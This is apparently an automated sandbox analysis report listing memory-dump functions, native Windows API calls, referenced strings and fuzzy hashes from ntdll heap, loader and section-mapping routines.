Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$CriticalDebugEnterSectionTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3040073958-1222099010
Opcode ID: 3b04b8c360bed818eb44aec3bc865787e2b1023959c808906bf9a3bff556cd51
Instruction ID: 86fd95691dee5c7d7f6f708e056eb62422f4cea999a45db68e6bed45a9cd3943
Opcode Fuzzy Hash: 3b04b8c360bed818eb44aec3bc865787e2b1023959c808906bf9a3bff556cd51
Instruction Fuzzy Hash: 12313F30A04A85DFD3239B6DC515B4E7BF4EF08712F00819BE8528B6D1DB34EA80CB15

Uniqueness

Uniqueness Score: -1.00%

Function 72657488, Relevance: 19.8, APIs: 13, Instructions: 290memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 7265BED4: RtlImageNtHeaderEx.210A(00000001,?,00000000,00000000,?,00000000,7265DBD8,?,?,?,?,7267A7FB,0000000C,?,FFFFFFFE,?), ref: 7265BF0D

RtlAcquireSRWLockExclusive.210A(72738550), ref: 726574E9
RtlAllocateHeap.210A(?,?,?,?,?,?,?,?,00000009,?,?,?,72738550), ref: 72657588
memcpy.210A(?,?,00000000,?,?,?,?,?,?,?,?,00000009,?,?,?,72738550), ref: 726575B9
ZwSetInformationProcess.210A(000000FF,00000023,00000000,?,?,?,?,?,?,00000009,?,?,?,72738550), ref: 72657614
RtlReleaseSRWLockExclusive.210A(72738550,?,?,?,?,?,00000009,?,?,?,72738550), ref: 7265767E
RtlAllocateHeap.210A(?,?,00000009,?,?,?,72738550), ref: 7265770D
RtlFreeHeap.210A(?,00000000,00000000,72738550,?,?,?,?,?,00000009,?,?,?,72738550), ref: 72657735
RtlReleaseSRWLockExclusive.210A(72738550,?,?,72738550), ref: 726AA648

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveHeapLock$AllocateRelease$AcquireFreeHeaderImageInformationProcessmemcpy
String ID:
API String ID: 1180735162-0
Opcode ID: 89de77a10c263a3496eaa36b8a36719ba15517ab7b6edade78c25117d67cbdd6
Instruction ID: f76b781c67a503d84b014b77e5a8f5ea318faa764141520ef562194b5d5bda38
Opcode Fuzzy Hash: 89de77a10c263a3496eaa36b8a36719ba15517ab7b6edade78c25117d67cbdd6
Instruction Fuzzy Hash: 8CB13B71E00249DFDB16CFAEC994B9DBBB6BF45304F20412BE506AB285D7709E55CB80

Uniqueness

Uniqueness Score: -1.00%

Function 726DB2C0, Relevance: 19.7, APIs: 13, Instructions: 199memorynativethreadCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,?,?,?,00000000,00800000,?,00000000,?,?,72656F67), ref: 726DB30B
RtlFreeHeap.210A(?,00000000,?,00000000,00000000,?,00000400,?,?,000000FF,00000028,00000200,00000000), ref: 726DB4B8
ZwClose.210A(00000000,00000000,00000000,?,00000400,?,?,000000FF,00000028,00000200,00000000), ref: 726DB4BF
ZwSetInformationThread.210A(000000FE,00000005,00000004,00000004,000000FF,00000028,00000200,00000000), ref: 726DB4D4
ZwClose.210A(00000004,000000FE,00000005,00000004,00000004,000000FF,00000028,00000200,00000000), ref: 726DB4E0
RtlFreeHeap.210A(?,00000000,00000000,000000FF,00000028,00000200,00000000), ref: 726DB4F1

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$CloseFree$AllocateInformationThread
String ID:
API String ID: 194745801-0
Opcode ID: 41855d4f8c16d0815ddf51b024f812f19ee6e374ca04a4005d6c9eaab33ca29a
Instruction ID: 0606897ec37448377334a2be3ded8140aa2b1e8e715216fbf2c2690ebca2033d
Opcode Fuzzy Hash: 41855d4f8c16d0815ddf51b024f812f19ee6e374ca04a4005d6c9eaab33ca29a
Instruction Fuzzy Hash: 3771F132240709EFDB22CF18C940F5A7BF6EF44724F21492AE6168B2E8DB75E945DB50

Uniqueness

Uniqueness Score: -1.00%

Function 72648730, Relevance: 18.2, APIs: 12, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(?), ref: 726487BC
RtlLeaveCriticalSection.210A(?), ref: 726487D3

Part of subcall function 7265DB60: RtlpNotOwnerCriticalSection.210A(?,?,?), ref: 7265DB97

RtlEnterCriticalSection.210A(?), ref: 726487FD
memcpy.210A(00000000,00000000,00000000), ref: 7264882D
RtlLeaveCriticalSection.210A(?), ref: 72648844
RtlLeaveCriticalSection.210A(?), ref: 726A3FA0
RtlFreeHeap.210A(?,00000000,00000000,?), ref: 726A3FB1

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeHeapOwnerRtlpmemcpy
String ID:
API String ID: 2476454231-0
Opcode ID: 327d2fa3170f30cc3196ef14574bd0b3f73d77f73c55ec4015287bb06efd9501
Instruction ID: de398e15446984b3fd48c56c7551aa444ce49427ffa8b7cefc8099e76701c30f
Opcode Fuzzy Hash: 327d2fa3170f30cc3196ef14574bd0b3f73d77f73c55ec4015287bb06efd9501
Instruction Fuzzy Hash: 9A51DE32A11644DFD7179F5ECC50B5A7BBAEF80B64F15446BE9028B2E0DA34DE11CB84

Uniqueness

Uniqueness Score: -1.00%

Function 726570E9, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 150nativelibraryCOMMON

Download Yara Rule

APIs

RtlEqualUnicodeString.210A(0000002C,7262112C,00000001,?,00000000,?,?,72656F67,?,00000000,00000000,?,000014A5,?,00000000,00000024), ref: 72657111
ZwMapViewOfSection.210A(00000000,000000FF,00000018,00000000,00000000,00000000,00000000,00000001,00800000,00000000,0000002C,7262112C,00000001,?,00000000), ref: 72657184
ZwUnmapViewOfSection.210A(000000FF,?,00000000,000000FF,00000018,00000000,00000000,00000000,00000000,00000001,00800000,00000000,0000002C,7262112C,00000001), ref: 726571FF
LdrQueryImageFileKeyOption.210A(?,?,00000004,00000000,00000004,00000000,0000002C,7262112C,00000001,?,00000000,?,?,72656F67,?,00000000), ref: 726AA559
RtlAcquirePrivilege.210A(7262E490,00000001,00000000,?,?,?,00000004,00000000,00000004,00000000,0000002C,7262112C,00000001,?,00000000), ref: 726AA575

Strings

Status: 0x%08lx, xrefs: 726AA5B3
minkernel\ntdll\ldrmap.c, xrefs: 726AA537, 726AA5C4
LdrpMinimalMapModule, xrefs: 726AA52D, 726AA5BA
DLL name: %wZ, xrefs: 726AA526

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: SectionView$AcquireEqualFileImageOptionPrivilegeQueryStringUnicodeUnmap
String ID: DLL name: %wZ$LdrpMinimalMapModule$Status: 0x%08lx$minkernel\ntdll\ldrmap.c
API String ID: 3505501266-1759440706
Opcode ID: df008c03a07243728b4cdb720232f539c250a2eedd9e1183d46d391f94d135a7
Instruction ID: cd2817e12b3e5793b20fbc48b396f551327414aa5f9f00acd0796a6963103fad
Opcode Fuzzy Hash: df008c03a07243728b4cdb720232f539c250a2eedd9e1183d46d391f94d135a7
Instruction Fuzzy Hash: 9441F971A00245AFEB278A6DCD40F697BB9AB04315F04026BED42A72C5D370EE40CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 72644101, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DbgPrint.210A(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,727032D6), ref: 726A11B4
DbgPrint.210A(Invalid heap signature for heap at %p,?,?,?,?,?,?,?,727032D6), ref: 726A11CD
DbgPrint.210A(, passed to %s,RtlGetUserInfoHeap,?,?,?,?,?,?,727032D6), ref: 726A11DE
DbgPrint.210A(72626BF8,?,?,?,?,?,?,727032D6), ref: 726A11EA

Strings

, passed to %s, xrefs: 726A11D9
RtlGetUserInfoHeap, xrefs: 726A11D8
HEAP: , xrefs: 726A11BC
Invalid heap signature for heap at %p, xrefs: 726A11C8
HEAP[%wZ]: , xrefs: 726A11AF

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlGetUserInfoHeap
API String ID: 3558298466-609737958
Opcode ID: 6e35961be863ba04f0d904c1eac40029cab83b0f628438e29abe10d279512574
Instruction ID: 495f6c4c8459ded4e530e39c0f5d9b3278a58304aeee52172c9e8f23f15fe3b5
Opcode Fuzzy Hash: 6e35961be863ba04f0d904c1eac40029cab83b0f628438e29abe10d279512574
Instruction Fuzzy Hash: 990141325040C19FE31A836CD42AB957BF4EB41B73F2490AFE4614BAC19E24AD80CA28

Uniqueness

Uniqueness Score: -1.00%

Function 726467D0, Relevance: 16.9, APIs: 11, Instructions: 373memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,?), ref: 726469B0
RtlEnterCriticalSection.210A(727379A0,?,00000000,?), ref: 726469D6
memcpy.210A(?,?,?,727379A0,?,00000000,?), ref: 726469FF
RtlLeaveCriticalSection.210A(727379A0), ref: 72646A0C
memset.210A(00000000,00000000,000002A4,727379A0), ref: 72646A1D

Part of subcall function 72646BE4: memcpy.210A(?,?,?,?,00000000,00000024,?,?,72646B9E,?,00000208,727379A0,?,?,727379A0), ref: 72646C09
Part of subcall function 72646BE4: memset.210A(00000208,00000000,00000208,?,00000000,00000024,?,?,72646B9E,?,00000208,727379A0,?,?,727379A0), ref: 72646C41

RtlDeNormalizeProcessParams.210A(00000000,?,?,00000000,?,?,?,?,?,?,-00000002,?,00000208), ref: 726A2966

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSectionmemcpymemset$AllocateEnterHeapLeaveNormalizeParamsProcess
String ID:
API String ID: 2315816726-0
Opcode ID: fe864ba74abcec2eb6dd9de4c9faf28154fe39658ed269228e773961bedba9bc
Instruction ID: 585a13712eb6f2eb0500a9d8957eb5c69c5b1ba183e6036837629df11556cd40
Opcode Fuzzy Hash: fe864ba74abcec2eb6dd9de4c9faf28154fe39658ed269228e773961bedba9bc
Instruction Fuzzy Hash: 8DD1A3B1A002069FCB09CF6DC990BAA7BB5BF04714F04516FE996DB2C0EB34DA55CB50

Uniqueness

Uniqueness Score: -1.00%

Function 7267523D, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 305memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 7267547E: ZwAllocateVirtualMemory.210A(000000FF,?,00000000,gRgr,00001000,?,00000000,?,?), ref: 72675537

ZwAllocateVirtualMemory.210A(000000FF,?,00000000,?,00002000,00000000,?,?,?,?,?,726662E7,?), ref: 7267532B
ZwAllocateVirtualMemory.210A(000000FF,?,00000000,?,00001000,?,000000FF,?,00000000,?,00002000,00000000,?,?,?), ref: 72675368
RtlGetCurrentServiceSessionId.210A(00000040,?,00000002,?,?,?,000000FF,?,00000000,?,00001000,?,000000FF,?,00000000,?), ref: 726753A8
RtlGetCurrentServiceSessionId.210A ref: 726753CA
RtlGetCurrentServiceSessionId.210A ref: 726753EC

Strings

bfr, xrefs: 72675340, 726B5FA0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateCurrentMemoryServiceSessionVirtual
String ID: bfr
API String ID: 3559878892-3986735625
Opcode ID: f2b57290a2cf380d2667ce52931fdb2083e4544a4b84859bba716792a5156c87
Instruction ID: 9b1e340408ed6a0029586744054c8d5198feca859abda116fcb37ecd17d5186a
Opcode Fuzzy Hash: f2b57290a2cf380d2667ce52931fdb2083e4544a4b84859bba716792a5156c87
Instruction Fuzzy Hash: 54B1BE316006459BDB16CBACD990BAEBBF6EF48304F2041AAEA12D73D9D774DD01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 727007AD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 153nativetimeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000040,?,000F001F,00000000,?,00000004,08000000,00000000,727379A0,00000000,HEAP: ), ref: 727007E6
ZwClose.210A(?), ref: 72700830
ZwCreateSection.210A(?,000F001F,00000000,?,00000004,08000000,00000000,727379A0,00000000,HEAP: ), ref: 72700865

Part of subcall function 7268A6A0: LdrInitializeThunk.NTDLL(726D1499,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 7268A6AA

ZwMapViewOfSection.210A(?,000000FF,?,00000000,00010000,?,?,00000002,00000000,00000004), ref: 727008D1
RtlDebugPrintTimes.210A(?,?,?,?,000000FF,?,00000000,00010000,?,?,00000002,00000000,00000004), ref: 72700911
ZwUnmapViewOfSection.210A(000000FF,?), ref: 72700925
ZwUnmapViewOfSection.210A(000000FF,00000000), ref: 7270096D
ZwClose.210A(00000000), ref: 7270097D

Strings

HEAP: , xrefs: 727007C3

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Section$View$CloseUnmap$CreateDebugInitializePrintThunkTimesmemset
String ID: HEAP:
API String ID: 32662658-2466845122
Opcode ID: 2008bc32138a16da8ae690a13f599a1b86a136df026f751ceec4c98d088b7192
Instruction ID: 6c34b987f5cebd978becd7991122c46c9302739538031153b0e2657af604b561
Opcode Fuzzy Hash: 2008bc32138a16da8ae690a13f599a1b86a136df026f751ceec4c98d088b7192
Instruction Fuzzy Hash: 2151BF71A183019FD724CF2DC981A1BBBE5EFC8725F144A2EF995A3290D730D948CB86

Uniqueness

Uniqueness Score: -1.00%

Function 726C3693, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 141nativeCOMMON

Download Yara Rule

APIs

wcschr.210A(?,0000003D,00000000,?), ref: 726C36AC
RtlInitUnicodeString.210A(?,-00000002,00000000,?), ref: 726C36D0
wcstoul.210A(-00000002,?,00000010,00000000,?), ref: 726C36EC
RtlAnsiStringToUnicodeString.210A(?,?,00000001,00000000,?), ref: 726C3772
RtlCompareUnicodeString.210A(?,?,00000001,?,?,00000001,00000000,?), ref: 726C3789
ZwProtectVirtualMemory.210A(000000FF,?,?,00000000,?,00000000,?), ref: 726C37BC
DbgPrintEx.210A(00000055,00000003,Set 0x%X protection for %p section for %d bytes, old protection 0x%X,00000000,?,?,?,000000FF,?,?,00000000,?,00000000,?), ref: 726C37D6
RtlFreeUnicodeString.210A(?,00000000,?), ref: 726C37ED

Strings

Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 726C37CD

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: String$Unicode$AnsiCompareFreeInitMemoryPrintProtectVirtualwcschrwcstoul
String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X
API String ID: 1186784509-1979073566
Opcode ID: 577a958b71e329297ba4659cd21054e01c26724ba14f1faa62483c1b908ae662
Instruction ID: a4ebc6682c8d3817fb5d6595e92191756c781ada09988d9c975a1751319d099c
Opcode Fuzzy Hash: 577a958b71e329297ba4659cd21054e01c26724ba14f1faa62483c1b908ae662
Instruction Fuzzy Hash: 0D41B971D41209AADF05EBA8C841BEEB7F9EF04310F50402BE556E31C0EB35E995D764

Uniqueness

Uniqueness Score: -1.00%

Function 7267E52F, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 137memorynativefileCOMMON

Download Yara Rule

APIs

ZwOpenFile.210A(?,?,?,00000021,00100020,?), ref: 7267E5A4
RtlFreeHeap.210A(?,00000000,?,?,?,?,00000021,00100020,?), ref: 7267E5BB
ZwQueryVolumeInformationFile.210A(00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021,00100020,?), ref: 7267E5DA
RtlAllocateHeap.210A(?,00000000,?,00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021,00100020,?), ref: 7267E5F8
memcpy.210A(00000018,?,00000000,00000000,?,00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021), ref: 7267E634
ZwClose.210A(00000000,00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021,00100020,?), ref: 726BB162
ZwClose.210A(?,?,?,?,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,727379A0,727379A0), ref: 726BB172
RtlFreeHeap.210A(?,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000), ref: 726BB183

Strings

@, xrefs: 7267E594

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$CloseFileFree$AllocateInformationOpenQueryVolumememcpy
String ID: @
API String ID: 3376599671-2766056989
Opcode ID: ffa9ffb589bf157b4cc268064afa724a4498c292fe1e6441c3a4ae1a23aaf430
Instruction ID: 084ff2b966c3e246226989af7b3ce02c6afbc495416a784cdf68b60a64782821
Opcode Fuzzy Hash: ffa9ffb589bf157b4cc268064afa724a4498c292fe1e6441c3a4ae1a23aaf430
Instruction Fuzzy Hash: 78517A715047509FC321CF59C840A6BBBF9FF48710F108A2AFA96976A0E774E914CB95

Uniqueness

Uniqueness Score: -1.00%

Function 7265669E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 116nativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A(?,Latest,00000000,02BDFFFE,?), ref: 726566EE
RtlAppendUnicodeToString.210A(02000000,\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages), ref: 72656716

Part of subcall function 72659980: memmove.210A(00000000,00000050,00000052,?,00000000,00000000,?,?,72659438,00000000,\REGISTRY\USER\,?,00020019,?,?,000000FA), ref: 726599D2

RtlAppendUnicodeToString.210A(02000000,72624F88,02000000,\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages), ref: 72656731
RtlAppendUnicodeToString.210A(02000000,?,02000000,72624F88,02000000,\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages), ref: 72656749
ZwOpenKey.210A(00000000,00020019,00000018,02000000,?,02000000,72624F88,02000000,\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages), ref: 726567A1

Strings

Latest, xrefs: 726566E8
@, xrefs: 7265678B
\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages, xrefs: 72656710

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: StringUnicode$Append$InitOpenmemmove
String ID: @$Latest$\Registry\Machine\Software\Microsoft\LanguageOverlay\OverlayPackages
API String ID: 1239783430-1383699509
Opcode ID: 110fcf71cbae6d7a7525d6e2a68c134e9727cdd31845cb7eabfcc51e24f03755
Instruction ID: fa7740e6a61d838adb5c5a49f7a79e0b5a69da06ca4aa20c97e1ccf1cbaef583
Opcode Fuzzy Hash: 110fcf71cbae6d7a7525d6e2a68c134e9727cdd31845cb7eabfcc51e24f03755
Instruction Fuzzy Hash: 09417E71D4126D9BDB218F59C898BDAB7B4AB48314F1105EBD809A7290EB71DE84CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 72647770, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 99nativeCOMMON

Download Yara Rule

APIs

ZwWaitForSingleObject.210A(?,00000000), ref: 726A369E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT(?,?,FF676980,000000FF,?,00000000), ref: 726A36B6
DbgPrintEx.210A(00000065,00000000,RTL: Acquire Shared Sem Timeout %d(%I64u secs),00000000,00000000,?,?,?,FF676980,000000FF,?,00000000), ref: 726A36C8
DbgPrintEx.210A(00000065,00000000,RTL: Resource at %p,?,00000065,00000000,RTL: Acquire Shared Sem Timeout %d(%I64u secs),00000000,00000000,?,?,?,FF676980,000000FF,?,00000000), ref: 726A36D6
DbgPrintEx.210A(00000065,00000000,RTL: Re-Waiting), ref: 726A36F3
RtlRaiseStatus.210A(00000000,?,00000000), ref: 726A370C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 726A36BE
RTL: Re-Waiting, xrefs: 726A36EB
RTL: Resource at %p, xrefs: 726A36CE

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$ObjectRaiseSingleStatusUnothrow_t@std@@@Wait__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 3771004841-605551621
Opcode ID: 90637d97c06cc709db33e937ed79da4f0a3d53f512a9c837ed75603dd24fb04d
Instruction ID: fd9c50dfcda821f8fd195995facba1b5378f0c66eef3dedf9732c45cf67caf2e
Opcode Fuzzy Hash: 90637d97c06cc709db33e937ed79da4f0a3d53f512a9c837ed75603dd24fb04d
Instruction Fuzzy Hash: 52314771A00522ABDB134A1DCC91F467B79EF01764B60020BE9555B6C1DF22EC22CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 7266D490, Relevance: 15.4, APIs: 10, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c498852a61433da963ff3113933ae76c9513740690f5fe6e39751661119333d
Instruction ID: 94e1aebb6db3e5f1d1cfc3e84436a964b234e9a3213759bb75398a42ce6e18eb
Opcode Fuzzy Hash: 2c498852a61433da963ff3113933ae76c9513740690f5fe6e39751661119333d
Instruction Fuzzy Hash: 9DE16070508342CFC705CF2DC590A2ABBF1BF88318F54896EE59A87391DB30E956CB92

Uniqueness

Uniqueness Score: -1.00%

Function 72671356, Relevance: 15.3, APIs: 10, Instructions: 269memorynativeCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.210A(?,7271F938,00000050,726719D8,?,7266B333,00000000,00000000,7271F810,0000001C,72642C6C,?,00000000,?,00000003), ref: 72671382

Part of subcall function 7265A050: RtlImageNtHeaderEx.210A(00000001,?,00000000,00000000,?,?,?,72671387,?,7271F938,00000050,726719D8,?,7266B333,00000000,00000000), ref: 7265A066

RtlAllocateHeap.210A(?,?,00000120,?,7271F938,00000050,726719D8,?,7266B333,00000000,00000000,7271F810,0000001C,72642C6C,?,00000000), ref: 726713CB
RtlAllocateHeap.210A(?,?,00000000,?,?,00000120,?,7271F938,00000050,726719D8,?,7266B333,00000000,00000000,7271F810,0000001C), ref: 72671408
RtlAllocateHeap.210A(?,?,?,?,?,00000000,?,?,00000120,?,7271F938,00000050,726719D8,?,7266B333,00000000), ref: 72671481
RtlAllocateHeap.210A(?,?,00000000,?,?,?,?,?,00000000,?,?,00000120,?,7271F938,00000050,726719D8), ref: 726714B8
ZwCreateIoCompletion.210A(00000028,001F0003,00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 7267152D
ZwCreateWorkerFactory.210A(00000024,000F00FF,00000000,?,000000FF,7266C8C0,00000000,7FFE03C0,?,?,00000028,001F0003,00000000,?), ref: 72671577
RtlAcquireSRWLockExclusive.210A(727386B4,00000000,00000024,000F00FF,00000000,?,000000FF,7266C8C0,00000000,7FFE03C0,?,?,00000028,001F0003,00000000,?), ref: 726715F8
